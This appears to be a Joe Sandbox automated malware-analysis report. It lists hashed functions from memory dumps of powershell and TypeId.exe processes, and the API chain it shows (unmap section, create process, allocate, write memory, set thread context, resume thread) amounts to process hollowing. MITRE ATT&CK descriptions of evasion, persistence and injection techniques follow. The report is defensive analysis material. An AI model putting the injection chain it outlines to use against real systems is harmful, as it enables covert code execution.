Opcode Fuzzy Hash: bb0d7d0209c89bffcf5b983814135b27a86cb46b4377b72d6c90d8322ec72af2
Instruction Fuzzy Hash: 31012C3261CE088FDBA8EF1DE48195237E0FB98320710069AD459C755AD735F896CBC1

Function 00007FFD9BAB33B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2526080240.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bab0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction ID: 17cf545b06c68c12749fae18c059a1fd3c0929f1bc305d672c46b898a287b68f
Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction Fuzzy Hash: 8301A73120CB0C4FD748EF0CE051AA6B3E0FF85320F10056EE58AC36A1DA32E882CB45

Function 00007FFD9BABA1F3 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2526080240.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bab0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54d42be3a1d0a0ecf678789c641b10803466674a665ac89facc36374d356d6a9
Instruction ID: b146371865047e4a26cef49048106e4e8a1975cbb898ab123bf4d23fe6659caa
Opcode Fuzzy Hash: 54d42be3a1d0a0ecf678789c641b10803466674a665ac89facc36374d356d6a9
Instruction Fuzzy Hash: EFF0FC36A0968D4FCB09EF2CD8654E57FA0EF56226B0403FBE45DCA063DA215548C7C1

Non-executed Functions

Function 00007FFD9BAB8BF2 Relevance: 6.3, Strings: 5, Instructions: 83COMMON

Download Yara Rule

Strings

M_^', xrefs: 00007FFD9BAB8C22
M_^8, xrefs: 00007FFD9BAB8C72
M_^7, xrefs: 00007FFD9BAB8C6A
M_^(, xrefs: 00007FFD9BAB8C2A
M_^;, xrefs: 00007FFD9BAB8C8A

Memory Dump Source

Source File: 0000000B.00000002.2526080240.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bab0000_powershell.jbxd

Similarity

API ID:
String ID: M_^'$M_^($M_^7$M_^8$M_^;
API String ID: 0-1737100074
Opcode ID: df815f000a4c1bc55688661cc254351339084bc4314358e17bb0778f81351017
Instruction ID: 765a6c25e54ba08214ff8ea2f717e92ace1594f7d202ade7c474800cd778ed29
Opcode Fuzzy Hash: df815f000a4c1bc55688661cc254351339084bc4314358e17bb0778f81351017
Instruction Fuzzy Hash: 5821B673B141158A9316BB7D68619E43790DF6823E78647F7F4A9CF4D3EC1470868684

Analysis Process: TypeId.exePID: 7468, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	11.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	15.8%
Total number of Nodes:	19
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9BC143F9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 102
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 00007FFD9BC1448E

Strings

U, xrefs: 00007FFD9BC1440A

Memory Dump Source

Source File: 0000000C.00000002.2364426862.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bc10000_TypeId.jbxd

Similarity

API ID: SectionUnmapView
String ID: U
API String ID: 498011366-3372436214
Opcode ID: fcbcd1b2ab7ceb1f14deba525f929d05f48a641f4fd43c77be976744d9886cf3
Instruction ID: b64a3937d1d2266f343f63280d4cc0eabc7fd5e4b85334b40acc3f95e3a05b5a
Opcode Fuzzy Hash: fcbcd1b2ab7ceb1f14deba525f929d05f48a641f4fd43c77be976744d9886cf3
Instruction Fuzzy Hash: 4D31A731A0CB484FDB2CEB68985A6FA7BE4EB56321F00417FD05AD3293DA756805CB81

Function 00007FFD9BC14519 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 390
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE ref: 00007FFD9BC14865

Strings

U, xrefs: 00007FFD9BC1452A

Memory Dump Source

Source File: 0000000C.00000002.2364426862.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bc10000_TypeId.jbxd

Similarity

API ID: CreateProcess
String ID: U
API String ID: 963392458-3372436214
Opcode ID: 559e64dce56db6b8a80f84642358eb0da3255982d9d6a99594e8bbec8054fe49
Instruction ID: 96194b7d643a7db675927ebeff468491b8ccbe35569fe798778380848d492f68
Opcode Fuzzy Hash: 559e64dce56db6b8a80f84642358eb0da3255982d9d6a99594e8bbec8054fe49
Instruction Fuzzy Hash: 84C1C230A18B8D8FEB64DF68CC567E977D1FB59310F11422ED84EC7291DB74A9418B82

Function 00007FFD9BC14299 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 131
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE ref: 00007FFD9BC1435F

Strings

U, xrefs: 00007FFD9BC142AA

Memory Dump Source

Source File: 0000000C.00000002.2364426862.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bc10000_TypeId.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: U
API String ID: 3559483778-3372436214
Opcode ID: 2280d03203bdc1209a12ec9220d7c6562eda752414c137b1b19197c40e1af4fe
Instruction ID: 496edd3277073645c1f0b2690585b7fa2db83183c12e061a17bb11302c406009
Opcode Fuzzy Hash: 2280d03203bdc1209a12ec9220d7c6562eda752414c137b1b19197c40e1af4fe
Instruction Fuzzy Hash: 3931D331A0CB5C4FDB289F5898466F97BE1FB59321F04426FE449D3292DF74A8468BC1

Function 00007FFD9BC14159 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 118
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE ref: 00007FFD9BC1420D

Strings

U, xrefs: 00007FFD9BC1416A

Memory Dump Source

Source File: 0000000C.00000002.2364426862.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bc10000_TypeId.jbxd

Similarity

API ID: AllocVirtual
String ID: U
API String ID: 4275171209-3372436214
Opcode ID: 1ec57b7c1829ff8754698fcd1b246ac0caffefcf52cabb3a61eefc0f1280a1bf
Instruction ID: 81e1ccff3e47204c4683b3dfd0182b3e2ee980c208b7a5f7e0e86b3a40b91925
Opcode Fuzzy Hash: 1ec57b7c1829ff8754698fcd1b246ac0caffefcf52cabb3a61eefc0f1280a1bf
Instruction Fuzzy Hash: FF31B831A0CB4C4FDB18AB689816AF97BE0EB59321F10426FD049C3292DB7568068BC5

Function 00007FFD9BC13D5D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 116
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE ref: 00007FFD9BC13E17

Strings

U, xrefs: 00007FFD9BC13D9A

Memory Dump Source

Source File: 0000000C.00000002.2364426862.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bc10000_TypeId.jbxd

Similarity

API ID: ResumeThread
String ID: U
API String ID: 947044025-3372436214
Opcode ID: 255dfb830e9fd8886ab495cf11609a91b63da3360672b1b14e9a71e903ebf62c
Instruction ID: e41330242e0d25dbd28fd9b633393cd65850f5f91c43f2f92758ec90d2bb3785
Opcode Fuzzy Hash: 255dfb830e9fd8886ab495cf11609a91b63da3360672b1b14e9a71e903ebf62c
Instruction Fuzzy Hash: 4831263190D7894FDB1ADBB888567E97FA0EF57320F0442AFC089C71A7CA786406CB52

Function 00007FFD9BC13FE9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 105
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadContext.KERNELBASE ref: 00007FFD9BC1407E

Strings

U, xrefs: 00007FFD9BC13FFA

Memory Dump Source

Source File: 0000000C.00000002.2364426862.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bc10000_TypeId.jbxd

Similarity

API ID: ContextThread
String ID: U
API String ID: 1591575202-3372436214
Opcode ID: aa2392ed5a3c89f19c02bb82b53d07151b10075dae59d6d68cecc04a70232401
Instruction ID: 377e0c44142df9ac9b91013cb73ec62366a4731d218467eb41e085eb91ecc69c
Opcode Fuzzy Hash: aa2392ed5a3c89f19c02bb82b53d07151b10075dae59d6d68cecc04a70232401
Instruction Fuzzy Hash: 6F31D93190CB488FDB289B68985A6FA7BE0EF55321F00417FD04AC3193DA74A805CB91

Function 00007FFD9BA969D8 Relevance: .5, Instructions: 501COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2337362865.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9ba90000_TypeId.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a2173337295b5bd6567ac3eb027c7965692933f01d350a1e768b321a76711b5
Instruction ID: 3a5b42f7732ea610d8c9a1460f851d03e79b844217de5f6b8180ce8e2537a71c
Opcode Fuzzy Hash: 8a2173337295b5bd6567ac3eb027c7965692933f01d350a1e768b321a76711b5
Instruction Fuzzy Hash: 5AF1D630B0890D8FDB58EF6CC465AB47BE1FF99354B1501BAE05ECB2A6CE35AC418751

Function 00007FFD9BA921B1 Relevance: .4, Instructions: 415COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2337362865.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9ba90000_TypeId.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f040bacad7189bafe60970b04dceb7cf765216ad2de4d35eaa167aee3803df6c
Instruction ID: cf1ce6bd4013c0a3e4ce4498c866139461088583c2d90d446cf342d129b59101
Opcode Fuzzy Hash: f040bacad7189bafe60970b04dceb7cf765216ad2de4d35eaa167aee3803df6c
Instruction Fuzzy Hash: EDD11931B1DA0D4FDBA8EBACC4656B877E1FF5D300B4601BAE00ED72A2CE686C019741

Function 00007FFD9BA905C0 Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2337362865.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9ba90000_TypeId.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b6684e1b50b3120a37561c9bcac6e69824829490be45b1bb92305f07f9ff9d0
Instruction ID: b3ac9988272f3f50c96ef411f008ab6c73addedc71bebfacfa2d431b16883825
Opcode Fuzzy Hash: 4b6684e1b50b3120a37561c9bcac6e69824829490be45b1bb92305f07f9ff9d0
Instruction Fuzzy Hash: E5C1F630B0990E4FEB98DB6CC464A7577E1FF99314F1601BAE01ECB2A6CE25BC428751

Function 00007FFD9BA90557 Relevance: .4, Instructions: 377COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2337362865.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9ba90000_TypeId.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbacfde286d4ff247aad7e2b25152e7a40b5e16681dc6dd116cf07f61dea18f4
Instruction ID: ea37b246f8acf6dd5314599dc900a676acbc8181d69c7430266880489c9f3e8d
Opcode Fuzzy Hash: bbacfde286d4ff247aad7e2b25152e7a40b5e16681dc6dd116cf07f61dea18f4
Instruction Fuzzy Hash: 53C10731B0990E4FDB58EB6CC464AB47BE1EF99314B1602BAE05DCB1E6CE25BC41C751

Function 00007FFD9BA96A35 Relevance: .4, Instructions: 362COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2337362865.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9ba90000_TypeId.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ac97b9bfd2e37e19abfb520b61fba33419952218886a755b790cec229c321ae
Instruction ID: f2c51806d77a1bbd35845baff09afe367360737ec41fa618523cbb8634b1681c
Opcode Fuzzy Hash: 5ac97b9bfd2e37e19abfb520b61fba33419952218886a755b790cec229c321ae
Instruction Fuzzy Hash: F1B1C531B0890E8FDB58EF6CC454AB47BE1FF59314B1641BAE05ECB2A6CA35AC41C791

Function 00007FFD9BA92F3D Relevance: .4, Instructions: 354COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2337362865.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9ba90000_TypeId.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f808959d5567a9d3f7cb2e58a12a9a92da4765b16ddc25db232d444a2428ad5a
Instruction ID: eba4b1a71f4c7a3295502718c7d9ab12dcd5643c834c271349441bca74858976
Opcode Fuzzy Hash: f808959d5567a9d3f7cb2e58a12a9a92da4765b16ddc25db232d444a2428ad5a
Instruction Fuzzy Hash: 2DB1D430B09A0E8FDB98DB6CC464A647BF1FF99314B1602FAD05DCB2A6CA65BC41C751

Function 00007FFD9BA905B8 Relevance: .3, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2337362865.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9ba90000_TypeId.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c6bdfa59450172f266abc32fb03a2141c5afaab82d41b890bfa78c0a0c71545
Instruction ID: c769d08d1800fbb3248bb1fb18d38cb7b36abe117e521d2e293a97e2a7de4da7
Opcode Fuzzy Hash: 6c6bdfa59450172f266abc32fb03a2141c5afaab82d41b890bfa78c0a0c71545
Instruction Fuzzy Hash: CAB1C430B1990E8FEB98DB6CC464A747BE1FF99314B2641B9D01DCB2A6CE35BC418751

Function 00007FFD9BA96A28 Relevance: .3, Instructions: 318COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2337362865.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9ba90000_TypeId.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b294064c35b21e47004e059e4b812e20f8c0c294c82780f33aeac7cc83f32da
Instruction ID: 84776577a221c79066c82bdc41d1918a5a56a5700a9e1e9cc00daf284e3249dc
Opcode Fuzzy Hash: 6b294064c35b21e47004e059e4b812e20f8c0c294c82780f33aeac7cc83f32da
Instruction Fuzzy Hash: 27A1B230B1890E8FDB98EF6CC454A747BE1FF69314B1601B9E05ECB2A6CA75AC41CB51

Function 00007FFD9BA9761D Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2337362865.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9ba90000_TypeId.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a13925b3f6ddc0ed313b5ba34d3e9dba8da42ad9d7f6d25a158dd7bb49e8f19b
Instruction ID: 4dd19bd236fe75294a6f820aad96d275191fbd4d6db5bc52c792019b5f57601c
Opcode Fuzzy Hash: a13925b3f6ddc0ed313b5ba34d3e9dba8da42ad9d7f6d25a158dd7bb49e8f19b
Instruction Fuzzy Hash: 69712932F0E51D4FE774EB5CD8A5AF93390EF95320F050176D14DC71A2ED696E828681

Function 00007FFD9BA97575 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2337362865.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9ba90000_TypeId.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58cb783954d18ef21e1f8c29bba048862920214ce860117c023a442f6ea8c76e
Instruction ID: 466e2be6eac153cda318c231cfc99506b32d633a5d8dca785d40692e147ed193
Opcode Fuzzy Hash: 58cb783954d18ef21e1f8c29bba048862920214ce860117c023a442f6ea8c76e
Instruction Fuzzy Hash: 0421B512B091550BD725F3BCA8B25E93B90DF6623F70902F3E0998D0E7EC08584AC155

Function 00007FFD9BA96D35 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2337362865.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9ba90000_TypeId.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0c1b7432b9e99574ccb53cad79d9c530523369b839be62578b1839b91cfc159
Instruction ID: 3b57d0fae337871a836ae13b3745a4a497a6e4d2f488118707c73fa07de08565
Opcode Fuzzy Hash: b0c1b7432b9e99574ccb53cad79d9c530523369b839be62578b1839b91cfc159
Instruction Fuzzy Hash: B1212835B0F68D8FE7119BACC4512EC7FA0EF85350F5645B6D444CB2E2E9B82689A341

Function 00007FFD9BA96D38 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2337362865.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9ba90000_TypeId.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efd47861ea8e3b00be3f677d6a2112ddc10ac1d35a45f3010e65c139db4473f4
Instruction ID: 9cde7597610bbcc16a0ce97f0f8ba5c76b04fa7740503780c6f3078c0e79264f
Opcode Fuzzy Hash: efd47861ea8e3b00be3f677d6a2112ddc10ac1d35a45f3010e65c139db4473f4
Instruction Fuzzy Hash: 89114432B0A64D8FEB11DBACC8502DC7FA0EF81366F1545B6E400CB2A1E9742689A780

Function 00007FFD9BA983BC Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2337362865.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9ba90000_TypeId.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 347eb4ef2cbf03bb18e44eb89616f55e6fe1cb1be95e8b7211f0d9e55cc5ed68
Instruction ID: 5b1eaaa801f5b1a6070e7326ab77784ae56e54174c3284a1629f64743953bc80
Opcode Fuzzy Hash: 347eb4ef2cbf03bb18e44eb89616f55e6fe1cb1be95e8b7211f0d9e55cc5ed68
Instruction Fuzzy Hash: DE018F51F0E90F4FF6B89BAC807563426D1DF59350F1602B7D50DDA2F2DEA82D016251

Function 00007FFD9BA96DB9 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2337362865.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9ba90000_TypeId.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb838c1618a93656baf0dd370add231379541a8315773e6a0637ff930848c218
Instruction ID: 6cd8b7c5ab7d8c7f2a11bf6306e10e1b6d3e76e48e32d41ba2d7a19ba48a8d72
Opcode Fuzzy Hash: fb838c1618a93656baf0dd370add231379541a8315773e6a0637ff930848c218
Instruction Fuzzy Hash: 50F0F630A0A64E8FF710CF58C4547EC7BA0FF01354F0441B4D015CB2A6DA782684E740

Function 00007FFD9BA92B4D Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2337362865.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9ba90000_TypeId.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 105b131f1cce3e7a5e38bba15e89ffa5e864093cbaa4bd442c3096b3ebadf730
Instruction ID: c710298ecbdfb988b5b445a8536546fd2240d4d47013342a6b7da95d1d9ae323
Opcode Fuzzy Hash: 105b131f1cce3e7a5e38bba15e89ffa5e864093cbaa4bd442c3096b3ebadf730
Instruction Fuzzy Hash: 46E0D8246084914FCB08F73D9CE08D93B60EF1532A74501E2F44CCA0A3D508A897C381

Function 00007FFD9BA98D66 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2337362865.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9ba90000_TypeId.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b99630a493bd7d4b686915ca6d1040ee8b540d136ec1b3bf94ce0c85eb1b5f5c
Instruction ID: ec7c4740ae86ea71f427a2318cface8d10cf1a9146ef233d01536326ede64fc3
Opcode Fuzzy Hash: b99630a493bd7d4b686915ca6d1040ee8b540d136ec1b3bf94ce0c85eb1b5f5c
Instruction Fuzzy Hash:

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
